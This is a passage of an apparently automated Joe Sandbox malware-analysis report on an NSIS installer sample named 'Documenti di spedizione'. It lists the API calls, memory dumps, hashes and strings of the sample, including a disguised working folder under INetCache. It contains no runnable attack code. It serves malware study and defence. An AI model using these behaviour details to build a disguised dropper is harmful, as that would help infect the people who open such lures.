                                            • API String ID: 1791698881-3916222277
                                            • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                            • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                            • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                            • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
                                            • Instruction ID: 023f80fe09a274ffd38664002148efa248b1b49841e283c842910b226ff12a9e
                                            • Opcode Fuzzy Hash: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
                                            • Instruction Fuzzy Hash: BA219171A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA7886408B28
                                            APIs
                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                              • Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                              • Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll), ref: 0040517E
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: 725aac035963670df89eafb1b7d16b4a342722268493254e79787a1b1d8c7f06
                                            • Instruction ID: 7d08e1e337802b2334af88e0c199d29f708e40c37bf94ee781fb5d0f0b1c297d
                                            • Opcode Fuzzy Hash: 725aac035963670df89eafb1b7d16b4a342722268493254e79787a1b1d8c7f06
                                            • Instruction Fuzzy Hash: 7B219571E00225F7DB207FA48E49A6E7A74AB44354F20417BF601B22D1D6BE4A42965E
                                            APIs
                                              • Part of subcall function 00405A02: CharNextA.USER32(?,?,C:\,?,00405A6E,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405A10
                                              • Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A15
                                              • Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A29
                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                              • Part of subcall function 004055D6: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405619
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid,00000000,00000000,000000F0), ref: 0040163C
                                            Strings
                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid, xrefs: 00401631
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid
                                            • API String ID: 1892508949-2470430059
                                            • Opcode ID: d3ecf39b463245ce7325277e5a84709cb344a9e2d097f8503a0b38c2d9d22c49
                                            • Instruction ID: 08eb89b31b1746408a8977735749f07bd83b4a0adfeb71850534f1b020668021
                                            • Opcode Fuzzy Hash: d3ecf39b463245ce7325277e5a84709cb344a9e2d097f8503a0b38c2d9d22c49
                                            • Instruction Fuzzy Hash: AF110831608151EBDF317FA54D415BF26B0DA92324B28097FE4D1B22D2D53E4943AA7E
                                            APIs
                                              • Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04
                                              • Part of subcall function 00405A02: CharNextA.USER32(?,?,C:\,?,00405A6E,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405A10
                                              • Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A15
                                              • Part of subcall function 00405A02: CharNextA.USER32(00000000), ref: 00405A29
                                            • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405AAA
                                            • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00405ABA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\
                                            • API String ID: 3248276644-3404278061
                                            • Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                            • Instruction ID: e1d085c028a746cb3a9e1ce3b1c858eea9bd943bc63f8ca8d2e2b8bbc1a38a79
                                            • Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                            • Instruction Fuzzy Hash: 02F0C835305D6526C622233A5C89AAF5A54CE86324719073BF891B52D2DB3C89439D7E
                                            APIs
                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
                                            • CloseHandle.KERNEL32(?), ref: 004056BE
                                            Strings
                                            • Error launching installer, xrefs: 0040569B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                            • Instruction ID: a84e3f3112e4284354e87e930577f618970dfa48977d7da17d28cbc3385d6636
                                            • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                            • Instruction Fuzzy Hash: 36E04FB0A002097FEB009B60EC05F7B7ABCE710204F808571BD01F2160D278A8008A78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
                                            • Instruction ID: 2e33bf0a2efd24b19013112e0e3dc0c5d96cbb3b8ddfa3d6198f03b0ea5f4905
                                            • Opcode Fuzzy Hash: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
                                            • Instruction Fuzzy Hash: 38A14271E00229CBDF28CFA8C8447ADBBB1FF44305F15806AD856BB281D7789A96DF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
                                            • Instruction ID: b6fdc69984dd60fe5839cdbb69547f11a37967466e553f406be5e4f069ddcdf3
                                            • Opcode Fuzzy Hash: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
                                            • Instruction Fuzzy Hash: 06912371E00228CBDF28CF98C8547ADBBB1FF44305F15816AD856BB291C778AA96DF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
                                            • Instruction ID: c7cee2028620334147dbeeecb81edbae78790ee6bd2d36d3aed28758d5738f0f
                                            • Opcode Fuzzy Hash: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
                                            • Instruction Fuzzy Hash: CF813471E00228DBDF24CFA8C844BADBBB1FF44305F25816AD856BB291D7389996DF14
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
                                            • Instruction ID: 57d0a4a62e73b261e138738b2685f27b9a830e1577229771e06a9dcc4a08ef7a
                                            • Opcode Fuzzy Hash: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
                                            • Instruction Fuzzy Hash: DC816771E04228DBDF24CFA8C844BADBBB1FF44315F11816AD856BB280C7786996DF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
                                            • Instruction ID: 7a0e56a60353855b6858f4e45cba095cd8fb81da81d2b3e1620468e36a0fecf5
                                            • Opcode Fuzzy Hash: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
                                            • Instruction Fuzzy Hash: E2710371E00228DBDF28CFA8C844BADBBB1FF44305F15806AD856BB291D7389996DF54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
                                            • Instruction ID: 640397e2d056f1a05ee02a3664d9fcc147c5dfb75bdb54ac859d1c8af1b059c5
                                            • Opcode Fuzzy Hash: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
                                            • Instruction Fuzzy Hash: 7F712471E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB291C7789996DF48
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                            • Instruction ID: 45e0d9c6199636d87fa33ccb5d6651f7628d4ee42d5e4054af8bad143df77737
                                            • Opcode Fuzzy Hash: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                            • Instruction Fuzzy Hash: D1714771E00228DBDF28CF98C844BADBBB1FF44305F15806AD956BB291C778AA56DF44
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 0040310C
                                              • Part of subcall function 00403277: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F75,?), ref: 00403285
                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403022,00000004,00000000,00000000,?,?,00402F9C,000000FF,00000000,00000000,00409130,?), ref: 0040313F
                                            • SetFilePointer.KERNELBASE(002806E1,00000000,00000000,004128D8,00004000,?,00000000,00403022,00000004,00000000,00000000,?,?,00402F9C,000000FF,00000000), ref: 0040323A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FilePointer$CountTick
                                            • String ID:
                                            • API String ID: 1092082344-0
                                            • Opcode ID: f6133f0060067ae216a0a077ebe86ad3920cfc852d280aeddc091818d184f87e
                                            • Instruction ID: b8bc3f79dcbb40427391aad23e9a2a3a4e055ade3e5059820f7b6748c1a5a64e
                                            • Opcode Fuzzy Hash: f6133f0060067ae216a0a077ebe86ad3920cfc852d280aeddc091818d184f87e
                                            • Instruction Fuzzy Hash: 3131A2B29042109BDB10BF29EE8086A3BECF754756715823FE501B22E0C738DD52DB5E
                                            APIs
                                              • Part of subcall function 004061FB: FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A9A,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00406206
                                              • Part of subcall function 004061FB: FindClose.KERNEL32(00000000), ref: 00406212
                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402281
                                            • lstrlenA.KERNEL32(00000000), ref: 0040228B
                                            • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                            • String ID:
                                            • API String ID: 1486964399-0
                                            • Opcode ID: 68b53b7b15cd5aa11021285071f00655329fa620989aceaac5983d704ca72be5
                                            • Instruction ID: 0317ded50e63044e70734c05992738adc8c04a0539f45c02fec05e083cfe155c
                                            • Opcode Fuzzy Hash: 68b53b7b15cd5aa11021285071f00655329fa620989aceaac5983d704ca72be5
                                            • Instruction Fuzzy Hash: 15113071E14219AACB10EFF5DA49A9EBAB8AF44314F14447FB100FB2C2D6BDC5418B69
                                            APIs
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
